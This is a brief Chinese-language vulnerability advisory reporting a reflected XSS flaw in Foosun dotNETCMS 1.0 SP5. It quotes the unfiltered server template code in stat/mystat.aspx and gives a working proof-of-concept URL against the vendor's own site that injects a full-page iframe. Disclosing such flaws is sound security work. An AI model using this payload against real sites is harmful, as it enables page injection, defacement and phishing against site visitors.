风讯dotNETCMS 1.0 SP5XSS漏洞
简要描述:由于程序未对用户提交的数据进行过滤,导致XSS漏洞。
详细说明:漏洞文件:stat/mystat.aspx
document.write("<script>var code='<%=code%>';var url='<%=str_fs_url%>'; var statid='<%=statid %>'</script>")
code未进行过滤产生XSS漏洞
漏洞证明:http://www.foosun.net/stat/mystat.aspx?code='</script>")<iframe src='http://www.baidu.com' width='100%' height='100%' frameborder=no border=0>
上一篇:奇智堡垒机V2.1存在搜索框注入
下一篇:天天团购0day